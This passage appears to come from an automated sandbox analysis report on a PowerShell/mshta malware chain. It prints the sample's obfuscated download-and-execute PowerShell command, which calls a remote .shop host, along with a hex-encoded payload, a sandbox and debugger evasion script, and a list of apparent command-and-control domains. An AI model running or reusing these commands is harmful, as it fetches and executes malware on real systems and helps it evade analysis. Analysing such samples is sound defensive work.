$OXSST) $XIIU}}}JWDQL;XR
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;|.6
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5366Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3830Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6089Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3512Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -14757395258967632s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.1786442355.00000000085F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPCQ
              Source: powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: mshta.exe, 00000000.00000003.1789725944.0000000000835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000002.00000002.1784148239.00000000074F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: powershell.exe, 0000000A.00000002.2890844747.000000000076C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1785844346.0000000008538000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_10-14141
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_003ADCD0 LdrInitializeThunk,10_2_003ADCD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 370000 value starts with: 4D5AJump to behavior
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: imbibelubmbe.click
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7ebc93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3d
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7ebc93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3dJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -*;set-variable ciu (.$executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name)|member|where-object{$_.name-like'*t*om*d'}).name).invoke($executioncontext.(($executioncontext|member)[6].name).(($executioncontext.(($executioncontext|member)[6].name).psobject.methods|where-object{$_.name-like'*om*e'}).name).invoke('n*-o*',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value|member)|where-object{$_.name-like'*nl*g'}).name).invoke((variable lw).value)).invokereturnasis() Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
